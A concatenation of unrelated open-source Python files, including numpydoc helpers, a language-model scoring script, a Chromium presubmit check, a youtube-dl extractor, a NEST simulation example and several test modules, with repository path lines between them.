out += self._str_index()
return '\n'.join(out)
def indent(str,indent=4):
indent_str = ' '*indent
if str is None:
return indent_str
lines = str.split('\n')
return '\n'.join(indent_str + l for l in lines)
def dedent_lines(lines):
"""Deindent a list of lines maximally"""
return textwrap.dedent("\n".join(lines)).split("\n")
def header(text, style='-'):
return text + '\n' + style*len(text) + '\n'
class FunctionDoc(NumpyDocString):
def __init__(self, func, role='func', doc=None, config={}):
self._f = func
self._role = role # e.g. "func" or "meth"
if doc is None:
if func is None:
raise ValueError("No function or docstring given")
doc = inspect.getdoc(func) or ''
NumpyDocString.__init__(self, doc)
if not self['Signature'] and func is not None:
func, func_name = self.get_func()
try:
# try to read signature
argspec = inspect.getargspec(func)
argspec = inspect.formatargspec(*argspec)
argspec = argspec.replace('*','\*')
signature = '%s%s' % (func_name, argspec)
except TypeError as e:
signature = '%s()' % func_name
self['Signature'] = signature
def get_func(self):
func_name = getattr(self._f, '__name__', self.__class__.__name__)
if inspect.isclass(self._f):
func = getattr(self._f, '__call__', self._f.__init__)
else:
func = self._f
return func, func_name
def __str__(self):
out = ''
func, func_name = self.get_func()
signature = self['Signature'].replace('*', '\*')
roles = {'func': 'function',
'meth': 'method'}
if self._role:
            if self._role not in roles:
print("Warning: invalid role %s" % self._role)
out += '.. %s:: %s\n \n\n' % (roles.get(self._role,''),
func_name)
out += super(FunctionDoc, self).__str__(func_role=self._role)
return out
class ClassDoc(NumpyDocString):
extra_public_methods = ['__call__']
def __init__(self, cls, doc=None, modulename='', func_doc=FunctionDoc,
config={}):
if not inspect.isclass(cls) and cls is not None:
raise ValueError("Expected a class or None, but got %r" % cls)
self._cls = cls
if modulename and not modulename.endswith('.'):
modulename += '.'
self._mod = modulename
if doc is None:
if cls is None:
raise ValueError("No class or documentation string given")
doc = pydoc.getdoc(cls)
NumpyDocString.__init__(self, doc)
if config.get('show_class_members', True):
if not self['Methods']:
self['Methods'] = [(name, '', '')
for name in sorted(self.methods)]
if not self['Attributes']:
self['Attributes'] = [(name, '', '')
for name in sorted(self.properties)]
@property
def methods(self):
if self._cls is None:
return []
return [name for name,func in inspect.getmembers(self._cls)
if ((not name.startswith('_')
or name in self.extra_public_methods)
and callable(func))]
@property
def properties(self):
if self._cls is None:
return []
return [name for name,func in inspect.getmembers(self._cls)
if not name.startswith('_') and func is None]
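# Minimal usage sketch (illustrative, not part of the original module): parse a
# small numpydoc-style docstring with the classes above and inspect the
# extracted sections. The example docstring and names are made up.
if __name__ == '__main__':
    _example = """
    Add two numbers.

    Parameters
    ----------
    a : int
        First addend.
    b : int
        Second addend.

    Returns
    -------
    int
        The sum of a and b.
    """
    _doc = NumpyDocString(_example)
    print(_doc['Summary'])     # ['Add two numbers.']
    print(_doc['Parameters'])  # [('a', 'int', ['First addend.']), ('b', 'int', ['Second addend.'])]
    print(_doc['Returns'])     # [('int', '', ['The sum of a and b.'])]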
|
RasmusD/SiRe
|
refs/heads/master
|
SiReData/txt2lmscore.py
|
1
|
##########################################################################
#Copyright 2015 Rasmus Dall #
# #
#Licensed under the Apache License, Version 2.0 (the "License"); #
#you may not use this file except in compliance with the License. #
#You may obtain a copy of the License at #
# #
#http://www.apache.org/licenses/LICENSE-2.0 #
# #
#Unless required by applicable law or agreed to in writing, software #
#distributed under the License is distributed on an "AS IS" BASIS, #
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.#
#See the License for the specific language governing permissions and #
#limitations under the License. #
##########################################################################
#Takes the txt files in a directory and scores them using a LM outputting
#one .scores file per .txt file containing each word line by line with its
#LM probability.
#Load the SiReImports.pth file
#Note this assumes we are in the SiReData dir when calling the script.
import site
site.addsitedir("../")
import argparse, os, subprocess, dictionary, lattice_tools
import sire_io as io
#Combines all txt files in a dir to one txt file where the others are written line by line.
def combine_txt(indirpath, outfilepath, overwrite=False):
lines = io.load_txt_dir(indirpath)
wf = io.open_writefile_safe(outfilepath, overwrite)
for line in lines:
wf.write(" ".join(line[1:])+"\n")
wf.close()
def score_word_ngram(args):
#Combine all txt files into one for LM scoring in one go.
comb_file = os.path.join(args.outdirpath, "combined.txt")
combine_txt(args.txtdir, comb_file, args.f)
if args.no_tmp_file:
return subprocess.check_output(args.lm_binary+" -ppl "+comb_file+" -lm "+args.lm_path + options, shell=True)
else:
subprocess.call(args.lm_binary+" -ppl "+comb_file+" -lm "+args.lm_path + options +" > "+os.path.join(args.outdirpath, "scored.txt"), shell=True)
return open(os.path.join(args.outdirpath, "scored.txt"), "r").read()
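# The parser below assumes SRILM "ngram -ppl -debug 2" output: one block per
# sentence separated by blank lines, with per-word lines roughly of the form
#   p( word | context ... ) = [ngram] prob [ logprob ]
# from which it keeps the word (token 1) and the log-probability
# (second-to-last token). This describes how the parsing code reads the output,
# not the SRILM documentation itself.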
def write_word_score_files(scores, args):
#First split on empty lines and then split on lines
scores = [x.split("\n") for x in scores.split("\n\n")]
#Pop the overall stats
scores.pop(-1)
#Take away unnecessaries
scores = [x[1:-3] for x in scores]
#Fix each line in each entry
for i, e in enumerate(scores):
for n, l in enumerate(e):
l = l.split()
scores[i][n] = l[1]+ " "+ l[-2]
#Match up each scored sent with a txt file.
#This relies on positions when listing txt dir.
  #Will fail if files other than .txt files are in the dir or if txtdir has been modified since scoring.
#Could also rely on content <- safer see TODO.
txt = os.listdir(args.txtdir)
n = 0
for t in txt:
if ".txt" in t:
wf = io.open_writefile_safe(os.path.join(args.outdirpath, t[:-3]+"scored"), args.f)
for l in scores[n]:
wf.write(l+"\n")
wf.close()
n+=1
#Create all the slfs and a list with paths to each file
def create_lattices_and_list(txtlist, outdirpath, dictionary, overwrite=False):
path_list = []
for txt in txtlist:
path = os.path.join(outdirpath, txt[0]+".phoneme_slf")
#Make the slf
slf = lattice_tools.make_phoneme_slf(txt[1:], dictionary, pronoun_variant=True, no_syll_stress=True)
#Write it out
wf = io.open_writefile_safe(path, overwrite)
for l in slf:
wf.write(l)
wf.close()
#Everything has gone well so we add the path
path_list.append(path)
#Write out the path file.
wf = io.open_writefile_safe(os.path.join(outdirpath, "lattices.list"))
for p in path_list:
wf.write(p+"\n")
wf.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Load a dir of txt and output LM scores for each word in the sent or for the most likely phoneme path for each word from a phoneme LM. This currently supports only SRILM NGRAM LMs.')
parser.add_argument('txtdir', type=str, help="The input directory.")
parser.add_argument('outdirpath', type=str, help="The output directory path.")
parser.add_argument('lm_path', type=str, help="Path to the LM to use.")
parser.add_argument('lm_binary', type=str, help="Path to the LM binary to use. This should be the SRILM NGRAM binary for WORD_NGRAM and SRILM LATTICE_TOOLS for PHONEME_NGRAM.")
parser.add_argument('-lm_type', type=str, help="The type of LM to use.", choices=['WORD_NGRAM', 'PHONEME_NGRAM'], default='WORD_NGRAM')
parser.add_argument('-lm_binary_options', type=str, nargs=argparse.REMAINDER, help="Additional arguments to be forwarded to the ngram binary. This overwrites the defaults for each -lm_type. As these differ for each type please see the code for details of the defaults. Note that the input/output options are always already specified by the arguments passed to this python script.")
parser.add_argument('-f', action="store_true", help="Overwrite all output files without asking.")
parser.add_argument('-no_tmp_file', action="store_true", help="If true a scored.txt file will not be written out and the .scored files produced directly.")
  parser.add_argument('-pre_scored', action="store_true", help="Indicates that a scored.txt file already exists and does not need to be remade, i.e. the LM does not need to be run.")
parser.add_argument('-lattices_exist', action="store_true", help="Indicates that lattices have already been created for each txt file and resides in the outdirpath.")
parser.add_argument('-combilexpath', type=str, help="Path to the combilex dictionary for creating lattices from if lm_type is PHONEME_NGRAM.")
args = parser.parse_args()
if args.lm_binary_options:
options += " "+" ".join(args.lm_binary_options)
else:
if args.lm_type == "WORD_NGRAM":
options = " -debug 2 -tolower -unk"
elif args.lm_type == "PHONEME_NGRAM":
# options = " -viterbi-decode -read-htk -order 4 -debug 1 -no-expansion -nbest-decode 10 -out-nbest-dir "+args.outdirpath
options = " -viterbi-decode -read-htk -order 4 -debug 1 -no-expansion -nbest-decode 10"
if args.f:
options += " -overwrite"
if args.lm_type == "WORD_NGRAM":
if not args.pre_scored:
scores = score_word_ngram(args)
else:
scores = open(os.path.join(args.outdirpath, "scored.txt"), "r").read()
#Do the work
write_word_score_files(scores, args)
elif args.lm_type == "PHONEME_NGRAM":
#First create lattices
if not args.lattices_exist:
txt = io.load_txt_dir(args.txtdir)
dictionary = dictionary.Dictionary(args.combilexpath)
create_lattices_and_list(txt, args.outdirpath, dictionary, args.f)
#Then score them
lattice_list_path = os.path.join(args.outdirpath, "lattices.list")
subprocess.call(args.lm_binary+" -lm "+args.lm_path+" -in-lattice-list "+lattice_list_path+options+" > "+os.path.join(args.outdirpath, "scored.txt"), shell=True)
|
mbauskar/helpdesk-erpnext
|
refs/heads/master
|
erpnext/patches/v5_0/convert_stock_reconciliation.py
|
104
|
import frappe, json
def execute():
# stock reco now amendable
frappe.db.sql("""update tabDocPerm set `amend` = 1 where parent='Stock Reconciliation' and submit = 1""")
frappe.reload_doc("stock", "doctype", "stock_reconciliation_item")
frappe.reload_doctype("Stock Reconciliation")
if frappe.db.has_column("Stock Reconciliation", "reconciliation_json"):
for sr in frappe.db.get_all("Stock Reconciliation", ["name"],
{"reconciliation_json": ["!=", ""]}):
start = False
sr = frappe.get_doc("Stock Reconciliation", sr.name)
for row in json.loads(sr.reconciliation_json):
if start:
sr.append("items", {
"item_code": row[0],
"warehouse": row[1],
"qty": row[2] if len(row) > 2 else None,
"valuation_rate": row[3] if len(row) > 3 else None
})
elif row[0]=="Item Code":
start = True
for item in sr.items:
item.db_update()
|
OptiPop/external_chromium_org
|
refs/heads/opti-5.1
|
content/test/gpu/page_sets/PRESUBMIT.py
|
52
|
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import re
import sys
def _GetTelemetryPath(input_api):
return os.path.join(
os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(
input_api.PresubmitLocalPath())))), 'tools', 'telemetry')
def LoadSupport(input_api):
if 'cloud_storage' not in globals():
# Avoid leaking changes to global sys.path.
_old_sys_path = sys.path
try:
telemetry_path = _GetTelemetryPath(input_api)
sys.path = [telemetry_path] + sys.path
from telemetry.util import cloud_storage
globals()['cloud_storage'] = cloud_storage
finally:
sys.path = _old_sys_path
return globals()['cloud_storage']
def _GetFilesNotInCloud(input_api):
"""Searches for .sha1 files and checks to see if they have already
been uploaded to Cloud Storage. Returns a list of those that have not.
"""
hash_paths = []
for affected_file in input_api.AffectedFiles(include_deletes=False):
hash_path = affected_file.AbsoluteLocalPath()
_, extension = os.path.splitext(hash_path)
if extension == '.sha1':
hash_paths.append(hash_path)
if not hash_paths:
return []
cloud_storage = LoadSupport(input_api)
# Look in both buckets, in case the user uploaded the file manually.
hashes_in_cloud_storage = cloud_storage.List(cloud_storage.PUBLIC_BUCKET)
try:
hashes_in_cloud_storage += cloud_storage.List(cloud_storage.INTERNAL_BUCKET)
except (cloud_storage.PermissionError, cloud_storage.CredentialsError):
pass
files = []
for hash_path in hash_paths:
file_hash = cloud_storage.ReadHash(hash_path)
if file_hash not in hashes_in_cloud_storage:
files.append((hash_path, file_hash))
return files
def _VerifyFilesInCloud(input_api, output_api):
"""Fails presubmit if any .sha1 files have not been previously uploaded to
Cloud storage.
"""
results = []
hash_paths = _GetFilesNotInCloud(input_api)
file_paths = []
for hash_path, _ in hash_paths:
results.append(output_api.PresubmitError(
'Attempting to commit hash file, but corresponding '
'data file is not in Cloud Storage: %s' % hash_path))
file_paths.append(os.path.splitext(hash_path)[0])
if len(file_paths) > 0:
upload_script_path = os.path.join(
_GetTelemetryPath(input_api), 'cloud_storage')
results.append(output_api.PresubmitError(
'To upload missing files, Run: \n'
'%s upload %s google-only' %
(upload_script_path, ' '.join(file_paths))))
return results
def CheckChangeOnUpload(input_api, output_api):
results = _VerifyFilesInCloud(input_api, output_api)
return results
def CheckChangeOnCommit(input_api, output_api):
results = _VerifyFilesInCloud(input_api, output_api)
return results
|
timokoola/hslbot
|
refs/heads/master
|
docutils/utils/code_analyzer.py
|
86
|
#!/usr/bin/python
# coding: utf-8
"""Lexical analysis of formal languages (i.e. code) using Pygments."""
# :Author: Georg Brandl; Felix Wiemann; Günter Milde
# :Date: $Date: 2011-12-20 15:14:21 +0100 (Die, 20. Dez 2011) $
# :Copyright: This module has been placed in the public domain.
from docutils import ApplicationError
try:
import pygments
from pygments.lexers import get_lexer_by_name
from pygments.formatters.html import _get_ttype_class
with_pygments = True
except ImportError:
with_pygments = False
# Filter the following token types from the list of class arguments:
unstyled_tokens = ['token', # Token (base token type)
'text', # Token.Text
''] # short name for Token and Text
# (Add, e.g., Token.Punctuation with ``unstyled_tokens += 'punctuation'``.)
class LexerError(ApplicationError):
pass
class Lexer(object):
"""Parse `code` lines and yield "classified" tokens.
Arguments
code -- string of source code to parse,
language -- formal language the code is written in,
tokennames -- either 'long', 'short', or 'none' (see below).
Merge subsequent tokens of the same token-type.
Iterating over an instance yields the tokens as ``(tokentype, value)``
tuples. The value of `tokennames` configures the naming of the tokentype:
'long': downcased full token type name,
'short': short name defined by pygments.token.STANDARD_TYPES
(= class argument used in pygments html output),
'none': skip lexical analysis.
"""
def __init__(self, code, language, tokennames='short'):
"""
Set up a lexical analyzer for `code` in `language`.
"""
self.code = code
self.language = language
self.tokennames = tokennames
self.lexer = None
# get lexical analyzer for `language`:
if language in ('', 'text') or tokennames == 'none':
return
if not with_pygments:
raise LexerError('Cannot analyze code. '
'Pygments package not found.')
try:
self.lexer = get_lexer_by_name(self.language)
except pygments.util.ClassNotFound:
raise LexerError('Cannot analyze code. '
'No Pygments lexer found for "%s".' % language)
# Since version 1.2. (released Jan 01, 2010) Pygments has a
# TokenMergeFilter. However, this requires Python >= 2.4. When Docutils
# requires same minimal version, ``self.merge(tokens)`` in __iter__ can
# be replaced by ``self.lexer.add_filter('tokenmerge')`` in __init__.
def merge(self, tokens):
"""Merge subsequent tokens of same token-type.
Also strip the final newline (added by pygments).
"""
tokens = iter(tokens)
(lasttype, lastval) = tokens.next()
for ttype, value in tokens:
if ttype is lasttype:
lastval += value
else:
yield(lasttype, lastval)
(lasttype, lastval) = (ttype, value)
if lastval.endswith('\n'):
lastval = lastval[:-1]
if lastval:
yield(lasttype, lastval)
def __iter__(self):
"""Parse self.code and yield "classified" tokens.
"""
if self.lexer is None:
yield ([], self.code)
return
tokens = pygments.lex(self.code, self.lexer)
for tokentype, value in self.merge(tokens):
if self.tokennames == 'long': # long CSS class args
classes = str(tokentype).lower().split('.')
else: # short CSS class args
classes = [_get_ttype_class(tokentype)]
classes = [cls for cls in classes if cls not in unstyled_tokens]
yield (classes, value)
class NumberLines(object):
"""Insert linenumber-tokens at the start of every code line.
Arguments
tokens -- iterable of ``(classes, value)`` tuples
startline -- first line number
endline -- last line number
Iterating over an instance yields the tokens with a
``(['ln'], '<the line number>')`` token added for every code line.
Multi-line tokens are split."""
def __init__(self, tokens, startline, endline):
self.tokens = tokens
self.startline = startline
# pad linenumbers, e.g. endline == 100 -> fmt_str = '%3d '
self.fmt_str = '%%%dd ' % len(str(endline))
def __iter__(self):
lineno = self.startline
yield (['ln'], self.fmt_str % lineno)
for ttype, value in self.tokens:
lines = value.split('\n')
for line in lines[:-1]:
yield (ttype, line + '\n')
lineno += 1
yield (['ln'], self.fmt_str % lineno)
yield (ttype, lines[-1])
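# Usage sketch (illustrative addition; assumes the Pygments package is installed):
# lex a small snippet with short CSS class names, then prepend line-number tokens.
if __name__ == '__main__':
    sample_code = 'def add(a, b):\n    return a + b\n'
    sample_tokens = Lexer(sample_code, 'python', tokennames='short')
    for css_classes, text in NumberLines(sample_tokens, startline=1, endline=2):
        print('%s %r' % (css_classes, text))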
|
chaowyc/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/drbonanza.py
|
109
|
from __future__ import unicode_literals
import json
import re
from .common import InfoExtractor
from ..utils import (
int_or_none,
parse_iso8601,
)
class DRBonanzaIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?dr\.dk/bonanza/(?:[^/]+/)+(?:[^/])+?(?:assetId=(?P<id>\d+))?(?:[#&]|$)'
_TESTS = [{
'url': 'http://www.dr.dk/bonanza/serie/portraetter/Talkshowet.htm?assetId=65517',
'info_dict': {
'id': '65517',
'ext': 'mp4',
'title': 'Talkshowet - Leonard Cohen',
'description': 'md5:8f34194fb30cd8c8a30ad8b27b70c0ca',
'thumbnail': 're:^https?://.*\.(?:gif|jpg)$',
'timestamp': 1295537932,
'upload_date': '20110120',
'duration': 3664,
},
'params': {
'skip_download': True, # requires rtmp
},
}, {
'url': 'http://www.dr.dk/bonanza/radio/serie/sport/fodbold.htm?assetId=59410',
'md5': '6dfe039417e76795fb783c52da3de11d',
'info_dict': {
'id': '59410',
'ext': 'mp3',
'title': 'EM fodbold 1992 Danmark - Tyskland finale Transmission',
'description': 'md5:501e5a195749480552e214fbbed16c4e',
'thumbnail': 're:^https?://.*\.(?:gif|jpg)$',
'timestamp': 1223274900,
'upload_date': '20081006',
'duration': 7369,
},
}]
def _real_extract(self, url):
url_id = self._match_id(url)
webpage = self._download_webpage(url, url_id)
if url_id:
info = json.loads(self._html_search_regex(r'({.*?%s.*})' % url_id, webpage, 'json'))
else:
# Just fetch the first video on that page
info = json.loads(self._html_search_regex(r'bonanzaFunctions.newPlaylist\(({.*})\)', webpage, 'json'))
asset_id = str(info['AssetId'])
title = info['Title'].rstrip(' \'\"-,.:;!?')
duration = int_or_none(info.get('Duration'), scale=1000)
# First published online. "FirstPublished" contains the date for original airing.
timestamp = parse_iso8601(
re.sub(r'\.\d+$', '', info['Created']))
def parse_filename_info(url):
match = re.search(r'/\d+_(?P<width>\d+)x(?P<height>\d+)x(?P<bitrate>\d+)K\.(?P<ext>\w+)$', url)
if match:
return {
'width': int(match.group('width')),
'height': int(match.group('height')),
'vbr': int(match.group('bitrate')),
'ext': match.group('ext')
}
match = re.search(r'/\d+_(?P<bitrate>\d+)K\.(?P<ext>\w+)$', url)
if match:
return {
'vbr': int(match.group('bitrate')),
'ext': match.group('ext')
}
return {}
video_types = ['VideoHigh', 'VideoMid', 'VideoLow']
preferencemap = {
'VideoHigh': -1,
'VideoMid': -2,
'VideoLow': -3,
'Audio': -4,
}
formats = []
for file in info['Files']:
if info['Type'] == "Video":
if file['Type'] in video_types:
format = parse_filename_info(file['Location'])
format.update({
'url': file['Location'],
'format_id': file['Type'].replace('Video', ''),
'preference': preferencemap.get(file['Type'], -10),
})
if format['url'].startswith('rtmp'):
rtmp_url = format['url']
format['rtmp_live'] = True # --resume does not work
if '/bonanza/' in rtmp_url:
format['play_path'] = rtmp_url.split('/bonanza/')[1]
formats.append(format)
elif file['Type'] == "Thumb":
thumbnail = file['Location']
elif info['Type'] == "Audio":
if file['Type'] == "Audio":
format = parse_filename_info(file['Location'])
format.update({
'url': file['Location'],
'format_id': file['Type'],
'vcodec': 'none',
})
formats.append(format)
elif file['Type'] == "Thumb":
thumbnail = file['Location']
description = '%s\n%s\n%s\n' % (
info['Description'], info['Actors'], info['Colophon'])
self._sort_formats(formats)
display_id = re.sub(r'[^\w\d-]', '', re.sub(r' ', '-', title.lower())) + '-' + asset_id
display_id = re.sub(r'-+', '-', display_id)
return {
'id': asset_id,
'display_id': display_id,
'title': title,
'formats': formats,
'description': description,
'thumbnail': thumbnail,
'timestamp': timestamp,
'duration': duration,
}
|
mogeiwang/nest
|
refs/heads/master
|
pynest/examples/HillTononi/ht_poisson.py
|
4
|
# -*- coding: utf-8 -*-
#
# ht_poisson.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
#
"""
A small example using the ht_neuron.
The neuron is bombarded with spike trains from four
Poisson generators, which are connected to the AMPA,
NMDA, GABA_A, and GABA_B synapses, respectively.
Once simulation is completed, membrane potential and
threshold, as well as synaptic conductances and intrinsic currents
are shown.
"""
import nest
import numpy as np
import matplotlib.pyplot as pl
nest.ResetKernel()
# create neuron
nrn = nest.Create('ht_neuron')
# get receptor ID information, so we can connect to the
# different synapses
receptors = nest.GetDefaults('ht_neuron')['receptor_types']
# create multimeter and configure it to record all information
# we want at 0.1ms resolution
mm = nest.Create('multimeter')
nest.SetStatus(mm, {'interval': 0.1,
'record_from': ['V_m', 'Theta', # membrane potential, threshold
# synaptic conductances
'g_AMPA', 'g_NMDA', 'g_GABAA', 'g_GABAB',
# intrinsic currents
'I_NaP', 'I_KNa', 'I_T', 'I_h']})
# create four Poisson generators
g = nest.Create('poisson_generator', 4, params={'rate': 100.})
# we cannot connect Poisson generators to neurons via dynamic synapses directly,
# so we put parrot neurons in between
p = nest.Create('parrot_neuron', 4)
# connect each generator to synapse with given weight
# using the adapting ht_synapse; connections pass through parrot neuron
for s in zip(g, p, [('AMPA', 500.0), ('NMDA', 50.), ('GABA_A', 250.), ('GABA_B', 100.0)]):
nest.Connect([s[0]], [s[1]])
nest.Connect([s[1]], nrn, syn_spec={'weight': s[2][1], 'receptor_type': receptors[s[2][0]],
'model': 'ht_synapse'})
# connect multimeter
nest.Connect(mm, nrn)
# simulate
for n in range(10):
nest.Simulate(100)
# extract data from multimeter
events = nest.GetStatus(mm)[0]['events']
t = events['times']  # time axis
pl.clf()
pl.subplot(311)
pl.plot(t, events['V_m'], 'b', t, events['Theta'], 'g')
pl.legend(['V_m', 'Theta'])
pl.ylabel('Membrane potential [mV]')
pl.title('ht_neuron driven by Poisson procs through AMPA, NMDA, GABA_A, GABA_B')
pl.subplot(312)
pl.plot(t, events['g_AMPA'], 'b', t, events['g_NMDA'], 'g',
t, events['g_GABAA'], 'r', t, events['g_GABAB'], 'm')
pl.legend(['AMPA', 'NMDA', 'GABA_A', 'GABA_B'])
pl.ylabel('Synaptic conductance [nS]')
pl.subplot(313)
pl.plot(t, events['I_h'], 'maroon', t, events['I_T'], 'orange',
t, events['I_NaP'], 'crimson', t, events['I_KNa'], 'aqua')
pl.legend(['I_h', 'I_T', 'I_NaP', 'I_KNa'])
pl.ylabel('Intrinsic current [pA]')
pl.xlabel('Time [ms]')
pl.plot()
|
simion/django-trampoline
|
refs/heads/develop
|
tests/test_paginator.py
|
2
|
"""
Test paginator for trampoline.
"""
from elasticsearch_dsl import Index
from elasticsearch_dsl import Search
from trampoline.paginator import ESSearchPaginator
from tests.base import BaseTestCase
from tests.models import Token
from tests.views import PaginatedContentView
class TestPaginator(BaseTestCase):
def setUp(self):
super(TestPaginator, self).setUp()
self.doc_type = Token.get_es_doc_type()
self.index = Index(self.doc_type._doc_type.index)
self.index.doc_type(self.doc_type)
self.index.create()
self.refresh()
for i in range(3):
Token.objects.create(name='token {0}'.format(i))
self.refresh()
def tearDown(self):
super(TestPaginator, self).tearDown()
self.index.delete()
def test_paginator(self):
search = Search(
index=Token.es_doc_type._doc_type.index,
doc_type=Token.es_doc_type._doc_type.name
)
search = search.sort('name')
page_size = 2
paginator = ESSearchPaginator(search, page_size)
page = paginator.page(1)
self.assertTrue(page.has_other_pages)
self.assertEqual(len(page.hits), page_size)
self.assertEqual(page.total_count, 3)
self.assertEqual(page.hits[0]['name'], 'token 0')
self.assertEqual(page.hits[1]['name'], 'token 1')
self.assertEqual(page.paginator, paginator)
self.assertEqual(page.number, 1)
self.assertIsNotNone(page.response)
page = paginator.page(2)
self.assertFalse(page.has_other_pages)
self.assertEqual(len(page.hits), 1)
self.assertEqual(page.hits[0]['name'], 'token 2')
def test_pagination_mixin(self):
class Request(object):
GET = {}
view = PaginatedContentView()
view.request = Request()
self.assertEqual(view.page_size, 2)
view.request.GET = {}
self.assertEqual(view.get_page_number(), 1)
view.request.GET = {'page': -2}
self.assertEqual(view.get_page_number(), 1)
view.request.GET = {'page': 'foobar'}
self.assertEqual(view.get_page_number(), 1)
view.request.GET = {'page': 5}
self.assertEqual(view.get_page_number(), 5)
page = view.paginate_search()
self.assertIsNotNone(page)
self.assertIsNotNone(view.page)
self.assertEqual(view.get_context_data()['page'], view.page)
|
rbaumg/trac
|
refs/heads/trunk
|
trac/admin/test.py
|
1
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2004-2019 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import difflib
import inspect
import io
import os
import re
import sys
import unittest
from trac.admin.console import AdminCommandManager, TracAdmin, _run
STRIP_TRAILING_SPACE = re.compile(r'( +)$', re.MULTILINE)
def load_expected_results(file, pattern):
"""Reads the file, named file, which contains test results separated
by the regular expression pattern.
The test results are returned as a dictionary.
"""
expected = {}
compiled_pattern = re.compile(pattern)
with open(file) as f:
test = None
for line in f:
line = line.rstrip().decode('utf-8')
match = compiled_pattern.search(line)
if match:
test = match.groups()[0]
expected[test] = ''
else:
expected[test] += line + '\n'
return expected
def _execute(func, strip_trailing_space=True, input=None):
_in = sys.stdin
_err = sys.stderr
_out = sys.stdout
try:
if input:
sys.stdin = io.BytesIO(input.encode('utf-8'))
sys.stdin.encoding = 'utf-8' # fake input encoding
sys.stderr = sys.stdout = out = io.BytesIO()
out.encoding = 'utf-8' # fake output encoding
return_val = func()
value = out.getvalue()
if isinstance(value, str): # reverse what print_listing did
value = value.decode('utf-8')
if strip_trailing_space:
return return_val, STRIP_TRAILING_SPACE.sub('', value)
else:
return return_val, value
finally:
sys.stdin = _in
sys.stderr = _err
sys.stdout = _out
def execute_cmd(tracadmin, cmd, strip_trailing_space=True, input=None):
def func():
try:
return tracadmin.onecmd(cmd)
except SystemExit:
return None
return _execute(func, strip_trailing_space, input)
class TracAdminTestCaseBase(unittest.TestCase):
expected_results_filename = 'console-tests.txt'
@classmethod
def setUpClass(cls):
cls.environ = os.environ.copy()
@classmethod
def tearDownClass(cls):
for name in set(os.environ) - set(cls.environ):
del os.environ[name]
os.environ.update(cls.environ)
@property
def expected_results_file(self):
results_file = sys.modules[self.__class__.__module__].__file__
return os.path.join(os.path.dirname(results_file),
self.expected_results_filename)
@property
def expected_results(self):
return load_expected_results(self.expected_results_file,
'===== (test_[^ ]+) =====')
def execute(self, cmd, strip_trailing_space=True, input=None):
if hasattr(self, 'admin'):
admin = self.admin
else:
admin = TracAdmin()
return execute_cmd(admin, cmd,
strip_trailing_space=strip_trailing_space,
input=input)
def assertExpectedResult(self, output, args=None):
test_name = inspect.stack()[1][3]
expected_result = self.expected_results[test_name]
if args is not None:
expected_result %= args
def diff():
# Create a useful delta between the output and the expected output
output_lines = ['%s\n' % x for x in output.split('\n')]
expected_lines = ['%s\n' % x for x in expected_result.split('\n')]
return ''.join(difflib.unified_diff(expected_lines, output_lines,
'expected', 'actual'))
msg = "%r != %r\n%s" % (expected_result, output, diff())
if '[...]' in expected_result:
m = re.match('.*'.join(map(re.escape,
expected_result.split('[...]'))) +
'\Z',
output, re.DOTALL)
self.assertTrue(m, msg)
else:
self.assertEqual(expected_result, output, msg)
@classmethod
def execute_run(cls, args):
def func():
try:
return _run(args)
except SystemExit:
return None
return _execute(func)
def get_command_help(self, *args):
docs = AdminCommandManager(self.env).get_command_help(list(args))
self.assertEqual(1, len(docs))
return docs[0][2]
def complete_command(self, *args):
return AdminCommandManager(self.env).complete_command(list(args))
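# Format sketch (illustrative; the entries below are hypothetical): the
# console-tests.txt file read by load_expected_results() is organised as blocks
# introduced by marker lines that match the pattern used above, for example:
#
#   ===== test_help_ok =====
#   trac-admin - The Trac Administration Console ...
#   ===== test_version =====
#   1.4
#
# With the pattern '===== (test_[^ ]+) =====' this yields a dictionary such as
# {'test_help_ok': '...\n', 'test_version': '1.4\n'}.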
|
simbha/GAE-appswell
|
refs/heads/master
|
appspot/framework/vendor/google_api/atom/mock_service.py
|
277
|
#!/usr/bin/python
#
# Copyright (C) 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MockService provides CRUD ops. for mocking calls to AtomPub services.
MockService: Exposes the publicly used methods of AtomService to provide
a mock interface which can be used in unit tests.
"""
import atom.service
import pickle
__author__ = 'api.jscudder (Jeffrey Scudder)'
# Recordings contains pairings of HTTP MockRequest objects with MockHttpResponse objects.
recordings = []
# If set, the mock service's HTTP requests are actually made through this object.
real_request_handler = None
def ConcealValueWithSha(source):
import sha
return sha.new(source[:-5]).hexdigest()
def DumpRecordings(conceal_func=ConcealValueWithSha):
if conceal_func:
for recording_pair in recordings:
recording_pair[0].ConcealSecrets(conceal_func)
return pickle.dumps(recordings)
def LoadRecordings(recordings_file_or_string):
if isinstance(recordings_file_or_string, str):
atom.mock_service.recordings = pickle.loads(recordings_file_or_string)
elif hasattr(recordings_file_or_string, 'read'):
atom.mock_service.recordings = pickle.loads(
recordings_file_or_string.read())
def HttpRequest(service, operation, data, uri, extra_headers=None,
url_params=None, escape_params=True, content_type='application/atom+xml'):
"""Simulates an HTTP call to the server, makes an actual HTTP request if
